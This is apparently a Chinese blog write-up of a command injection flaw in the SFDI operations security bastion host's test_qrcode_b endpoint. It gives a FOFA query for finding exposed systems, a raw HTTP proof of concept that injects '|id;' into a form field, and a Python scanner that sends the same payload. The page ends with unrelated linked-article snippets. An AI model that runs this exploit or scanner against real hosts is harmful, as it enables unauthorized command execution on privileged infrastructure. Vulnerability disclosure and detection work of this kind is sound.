思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
- 一、漏洞描述
- 二、漏洞影响
- 三、网络测绘
- 四、漏洞复现
- 1.手动复现
- 2.自动化复现
- 3.python源代码
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、漏洞描述
思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞。
二、漏洞影响
思福迪 运维安全管理系统
三、网络测绘
app=“思福迪-LOGBASE”
四、漏洞复现
登陆页面
1.手动复现
验证POC
POST /bhost/test_qrcode_b HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 23
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzipz1=1&z2="|id;"&z3=bhost
burp截图
2.自动化复现
小龙POC检测脚本正式开源,请各路大神完善和批评
小龙POCexe传送门: 小龙POC工具
小龙POC开源传送门: 小龙POC工具
3.python源代码
# SFDI_Security_Management_System_test_qrcode_b_Command_Vuln_Scan.pyimport requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import Timeoutdef Scan_SFDI_Security_Management_System_test_qrcode_b_Command_Vuln(url, proxies, headers, append_to_output):proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}if url.endswith("/"):path = "bhost/test_qrcode_b"else:path = "/bhost/test_qrcode_b"if not url.startswith('http://') and not url.startswith('https://'):url = 'http://' + urlheaders = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36","Content-Length": "23","Connection": "close","Content-Type": "application/x-www-form-urlencoded","Referer": url,"Accept-Encoding": "gzip",}encodetext = url + pathdata='''z1=1&z2="|id;"&z3=bhost'''append_to_output("===================================================================", "green")append_to_output(f"扫描目标: {url}", "yellow")try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)req1 = requests.post(encodetext, data=data, headers=headers, verify=False, timeout=20, proxies=proxies)if req1.status_code == 200 and 'uid' in req1.text:append_to_output(f"[+] {url} 存在思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞!!!!", "red")else:append_to_output(f"[-] {url} 不存在思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞", "green")except Timeout:append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")except Exception as e:if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")else:append_to_output(str(e), "yellow")
相关文章:
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞 一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现1.手动复现2.自动化复现3.python源代码 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任…...
electron项目开机自启动
一、效果展示:界面控制是否需要开机自启动 二、代码实现: 1、在渲染进程login.html中,画好界面,默认勾选; <div class"intro">开机自启动 <input type"checkbox" id"checkbox&quo…...
2023年约特干故城夜间演艺《万方乐奏有于阗》完美谢幕
11月19日,记者走进约特干故城看到演员在欢乐地跳着刀郎舞和古典舞,庆祝今年以来夜间演艺《万方乐奏有于阗》演出200场完美谢幕。 11月19日在约特干故城,演员正在表演迎宾乐舞。阿卜力克木依卜拉依木摄 当天晚上,城楼上旌旗猎猎&am…...
学习网络编程No.10【深入学习HTTPS】
引言: 北京时间:2023/11/14/18:45,因为种种原因,上个月的文章昨天才更新,目前处于刷题前夕,算法课在看了。这次和以前不一样,因为以前对知识框架没有很好的理念,并不清楚相关知识要…...
ubuntu下docker环境使用GPU配置
本文主要讲述整个命令流程,具体讲解请看官网nvidia-容器工具包和一篇总结得很详细的博文docker使用GPU总结 docker的版本必须安装19.0版本以上的,这里也只讲19.0版本以上的使用方法 首先设置一下网络信息 curl -fsSL https://nvidia.github.io/libnvi…...
渗透工具---BurpSuite 插件开发之HelloWorld
本文主要记录如何利用burp官方的新版API即MontoyaApi 写helloworld(上一篇的demo使用旧版api写的,这篇及后续开发将采用新版api) 先看效果图 更多详细内容见下方 这里有更详细更全面的代码内容 以及配置相关的内容 https://mp.weixin.qq.co…...
2216. 美化数组的最少删除数
我的做法: 使用一个index作为检查坐标,当index为偶数时检查当前数和后一个数是否相等,相等的话,后一个数设置为-1,注意如果相等,要把相等的数保留下来last,以便接下来检查,防止出现2…...
竞赛 题目:基于深度学习的人脸表情识别 - 卷积神经网络 竞赛项目 代码
文章目录 0 简介1 项目说明2 数据集介绍:3 思路分析及代码实现3.1 数据可视化3.2 数据分离3.3 数据可视化3.4 在pytorch下创建数据集3.4.1 创建data-label对照表3.4.2 重写Dataset类3.4.3 数据集的使用 4 网络模型搭建4.1 训练模型4.2 模型的保存与加载 5 相关源码6…...
基于安卓android微信小程序的好物分享系统
运行环境 开发语言:Java 框架:ssm JDK版本:JDK1.8 服务器:tomcat7 数据库:mysql 5.7(一定要5.7版本) 数据库工具:Navicat11 开发软件:eclipse/myeclipse/idea Maven包&a…...
【Spring Boot】使用WebSocket协议完成来单提醒及客户催单功能
1 WebSocket介绍 WebSocket 是基于 TCP 的一种新的网络协议。它实现了浏览器与服务器全双工通信(双向传输)——浏览器和服务器只需要完成一次握手,两者之间就可以创建持久性的连接, 并进行双向数据传输。 1.1 HTTP协议和WebSocket协议对比 1、HTTP是短…...
如何有效的禁止Google Chrome自动更新?
禁止Chrome自动更新 1、背景2、操作步骤 1、背景 众所周知,当我们在使用Selenium进行Web自动化操作(如爬虫)时,一般会用到ChromeDriver。然而Driver的更新速度明显跟不上Chrome的自动更新。导致我们在使用Selenium进行一些操作时就…...
OpenShift 4 - 部署 RHODS 环境,运行 AI/ML 应用(视频)
《OpenShift / RHEL / DevSecOps 汇总目录》 说明:本文已经在 OpenShift 4.14 RHODS 1.33 的环境中验证 文章目录 RHODS 简介安装 RHODS 环境运行环境说明用 RHODS Operator 安装环境创建 Jupyter Notebook 运行环境 开发调式 AI/ML 应用部署运行 AI/ML 应用视频参…...
MySQL 的执行原理(二)
5.3. MySQL 的查询成本 5.3. MySQL 的查询成本 MySQL 执行一个查询可以有不同的执行方案,它会选择其中成本最低,或者 说代价最低的那种方案去真正的执行查询。不过我们之前对成本的描述是非常模 糊的,其实在 MySQL 中一条查询语句的执行成本…...
 和 =any(?) 用法/性能对比)
postgres in (?,?) 和 =any(?) 用法/性能对比
刚刚回顾了一下 JDBC 操作 SQL Server 时如何传入列表参数,即如何给 in (?) 条件直接传入一个列表参数,然而本质上是不支持,最终不得不展开为 in (?, ?,...?) 针对每个元素单独设置参数,不定长的参数对于重用已编译 PreparedS…...
46. Qt Android调用Java代码进行辅助开发 -- 框架搭建
1. 说明 使用Qt进行android开发时,某种情况下使用C++的知识或者Qt提供的方法是无法满足功能需求的,即使通过各种手段能够勉强实现功能,也非常的麻烦。此时,就需要Java来辅助实现了。在Qt中提供了调用Java代码的接口,比较方便。本片博客先介绍如何搭建一个能够调用java代码…...
NX二次开发UF_CAM_PREF_set_logical_value 函数介绍
文章作者:里海 来源网站:https://blog.csdn.net/WangPaiFeiXingYuan UF_CAM_PREF_set_logical_value Defined in: uf_cam_prefs.h int UF_CAM_PREF_set_logical_value(UF_CAM_PREF_t pref, logical value ) overview 概述 This function sets the lo…...
docker下移除不使用的镜像、容器、卷、网络
Prune images docker image prune移除没有标签并且没有被容器引用的镜像,这种镜像称为 dangling(摇晃的) 镜像。 示例1:docker image prune 删除了redis,无标签且无引用 docker ps -a CONTAINER ID IMAGE COMMAND CREATED STA…...
C语言基本算法之选择排序
目录 概要: 代码如下 运行结果如下 概要: 它和冒泡排序一样,都是把数组元素按顺序排列,但是方法不同,冒泡排序是把较小值一个一个往后面移,选择排序则是直接找出最小值,可以这个说ÿ…...
服务器数据恢复—raid5上层NTFS分区误删除/格式化的数据恢复案例
NTFS是windows操作系统服务器应用最为广泛的文件系统之一。理论上,NTFS文件系统格式化操作虽然不会对数据造成太大的影响,但是有可能会出现部分文件目录结构丢失的情况。下面介绍一台服务器误操作导致raid5阵列上层的NTFS分区被格式化后如何逆向操作恢复…...
【漏洞复现】IP-guard WebServer 存在远程命令执行漏洞
漏洞描述 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 免责声明 技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危…...
如何快速配置Emby自定义CSS和JS插件:新手完整教程
如何快速配置Emby自定义CSS和JS插件:新手完整教程 【免费下载链接】Emby.CustomCssJS Easy to manage your Custom JavaScript and Css to modify Emby 项目地址: https://gitcode.com/gh_mirrors/em/Emby.CustomCssJS 想要为你的Emby媒体服务器打造独一无二…...
优学宝在线课程小程序正式上线!主打多元化在线课程模式,涵盖视频、音频、图文、专题四大课程类型,全品类内容全覆盖,随时随地在线学习,一站式高效提升自我。
官网链接:https://youxuebao.com.cn 管理后台演示地址:https://demoadmin.youxuebao.com.cn/admin 商户后台演示地址:https://demomanage.youxuebao.com.cn/platform 前端演示地址:https://demo.youxuebao.com.cn 演示账号&am…...
解锁Unity资源宝库:用AssetRipper在3个场景中高效提取游戏资产
解锁Unity资源宝库:用AssetRipper在3个场景中高效提取游戏资产 【免费下载链接】AssetRipper GUI Application to work with engine assets, asset bundles, and serialized files 项目地址: https://gitcode.com/GitHub_Trending/as/AssetRipper 你是否曾面…...
VoWLAN技术挑战与802.11e QoS解决方案解析
1. VoWLAN技术挑战与802.11e QoS解决方案深度解析作为一名在无线通信领域工作多年的工程师,我见证了VoWLAN技术从实验室走向商用的全过程。在这个过程中,最核心的挑战始终是如何在共享的无线介质上保障语音业务的质量。本文将基于IEEE 802.11标准族的技术…...
【点米动力】现在都没几个人知道当时百度和淘宝抢电商流量入口的事情了
一个简单的robots.txt,当时可是吵到上热搜那种程度。电商发展这么多年后,都没几个人记得这些事情了。...
AI视频总结怎么做?多模态AI从音视频到结构化知识的实践
摘要: 视频总结是内容从业者的刚需——但手动做视频总结太耗时间。本文探讨多模态AI技术(语音视觉文本)如何实现自动化视频总结,分析当前主流方案,并分享如何利用多模态能力高效完成视频转笔记、构建个人知识库。 一、…...
观察 Taotoken 账单明细如何实现项目成本的精准分摊
观察 Taotoken 账单明细如何实现项目成本的精准分摊 对于技术团队负责人或项目管理者而言,大模型 API 的调用成本管理是一个既重要又繁琐的课题。当多个项目、不同团队共享同一个模型服务池时,如何清晰地追溯每一笔花费的来源,并将其准确地分…...
跨平台智能消息机器人:基于大语言模型的多IM自动化实践
1. 项目概述与核心价值最近在折腾自动化工具时,发现了一个挺有意思的项目,叫“kunkeji/chatGPT_auto_msg_multiPlat”。光看名字,你大概能猜到它想干什么:一个能自动发送消息的机器人,并且支持多个平台,背后…...
3个关键步骤解决在线视频保存难题:VideoDownloadHelper完全指南
3个关键步骤解决在线视频保存难题:VideoDownloadHelper完全指南 【免费下载链接】VideoDownloadHelper Chrome Extension to Help Download Video for Some Video Sites. 项目地址: https://gitcode.com/gh_mirrors/vi/VideoDownloadHelper 还在为无法保存心…...
)
手把手教你用Qt QTableWidget打造一个带交互的‘课程表’应用(附完整源码)
用Qt QTableWidget构建智能课程表:从基础布局到高级交互实战 大学校园里,课程表是每位师生离不开的日常工具。传统的纸质课程表或静态电子表格往往功能单一,缺乏个性化设置和动态交互能力。本文将带你用Qt的QTableWidget控件打造一个功能丰富…...